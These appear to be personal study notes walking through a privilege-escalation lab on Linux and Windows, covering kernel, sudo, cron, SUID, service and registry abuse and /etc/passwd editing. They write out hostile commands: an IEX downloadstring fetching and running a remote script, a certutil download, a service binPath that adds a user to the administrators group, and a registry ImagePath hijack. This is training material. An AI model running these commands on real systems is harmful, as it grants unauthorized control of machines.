Practising Privilege Escalation (sagishahar ipeworkshop)
Link to exercise: https://github.com/sagishahar/lpeworkshop
---------------------------------------------------------------------------------------
Questions:https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf
Exercise 1 - Kernel
uname -a (check version of kernel)
use google or searchsploit to check if the version is vulnerable to any exploit
more info from liveoverflow about dirtycow:
https://www.youtube.com/watch?v=kEsshExn7aE&vl=en
Exercise 2 - Daemons
Basic recon: LinEnum, linprivchecker, Linpeas, Linux Exploit Suggester and pspy
and check services against searchsploit
Exercise 6 - Sudo (Shell Escape Sequences)
sudo -l and search GTFObins for any shell escapes
Exercise 7 - Sudo (Abusing Intended Features)
check for unknown binaries if not found in GTFObins for bugs
Exercise 8 - Sudo (LD_PRELOAD)
more info:
https://www.boiteaklou.fr/Abusing-Shared-Libraries.html
Exercise 9 - NFS
mount to your own system and run as root (root is not removed)
Exercise 10 - Cron (Path)
checking cronjobs: pspy, crontab -l, cat /etc/crontab
checking if binary is vulnerable to path exploiting: echo $PATH or use linpeas
more info on path:
https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
more info check out ippsec's nineveh to create your own script to catch cronjobs
https://www.youtube.com/watch?v=K9DKULxSBK4&t=1890s
Exercise 11 - Cron (Wildcards)
turning * into command options and exploiting shell escapes:
https://gtfobins.github.io/gtfobins/tar/
Exercise 12 - Cron (File Overwrite)
bad perms
find world-writable files
find / -perm -o+w 2>/dev/null
Exercise 13 - File Permissions (Suid Binary - .so Injection)
Binaries attempting to run missing .so files
Exercise 14 - File Permissions (Suid Binary - Symlinks)
link owned file -> file owned by root
ln -s /home/user/user_file /root
(suid will be able to access /root file)
for example, tar -cvf /home/user/backup.tar /home/user/user_file
(unzip backup.tar for /root)
more info: https://percussiveelbow.github.io/linux-privesc/
Exercise 15 and 16 - File Permissions (Environment Variables)
# strings execute_me: /usr/bin/service apache2 start
check SUID with strings to check what it is running
function /usr/bin/service() { whoami; } <- create function
export -f /usr/bin/service <- link function to env
export -f (to check function u just created)
# strings execute_me2: service apache2 start
alternatively:
function service() { whoami; }
---------------------------------------------------------------------------------------
Exercise 2 - Services (DLL Hijacking)
DLL hijacking works by placing your own DLL in a writable path which a service would attempt to run but fails as it is missing, hence "NAME NOT FOUND"
Kali:
Use nishang's invoke-powershelltcp.ps1:
https://github.com/samratashok/nishang
type this command in the window's powershell to get shell:
IEX (new-object net.webclient).downloadstring('http://x.x.x.x/x.ps1')
use certutil.exe -urlcache -split -f *url *file_name to download a file.
change the shell script to another port and listen on that port.
run start-service dllsvc to run your dll.
instead of using procmon you can use powersploit:
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Exercise 3 - Services (binPath)
Replacing the binPath of a service to your command makes the service run that instead of starting the executable.
Checks for permissions for "Everyone" on every service.
while doing exercise 3 I noticed that when I start daclsvc, it errored out.
but it still ran the command (to add user to admin group) anyways.
#sc config daclsvc binpath= "net localgroup administrators user /add"
After trying IEX and certutil, it didn't work, probably some encoding issue.
when to look for more reverse shells and tried mshta, it seemed to work
more info:https://github.com/freshness79/HTA-Shell
Exercise 4 - Services (Unquoted Path)
Command: https://pentestlab.blog/2017/03/09/unquoted-service-path/
Hence the service would run common.exe first.
Exercise 5 - Services (Registry)
Alternatively, you can use 'everyone allow fullcontrol'
Command: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\common.exe /f
#change registry to point to path of your executable
Exercise 6 - Services (Executable File)
Copy and paste the .exe as moving it will use the permissions of "File Permissions Service" which you do not have access to.
All edited programs/code referenced from: https://github.com/sagishahar/lpeworkshop
Privilege Escalation: Library Hijacking
Exploit cronjobs running python script
---------------------------------------------------------------------------------------
Python script:
since the script is using the calendar library, we will use the file: /usr/lib/python2.7/calendar.py (easily found in the python documentation)
add a reverse shell payload to the end:
source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
wait for the script to run:
---------------------------------------------------------------------------------------
Stricter imports:
Through globals() we can find what is imported
'day_name': <calendar._localized_day instance at 0x...>
---------------------------------------------------------------------------------------
Pivoting through different imports:
Privilege Escalation: priority of /etc/shadow and /etc/passwd
/#making a password
openssl passwd password (1oCs2Y6GOzDm2)2020/04/28/203446
openssl passwd pass (mV.TZP57qoG6s)
source: Editing /etc/passwd File for Privilege Escalation
---------------------------------------------------------------------------------------
#changing /etc/passwd root:password
---------------------------------------------------------------------------------------
#/etc/shadow root with no login (default)
#trying to log in to root with password: success
---------------------------------------------------------------------------------------
#changing /etc/shadow root:pass
Conclusion: /etc/passwd > /etc/shadow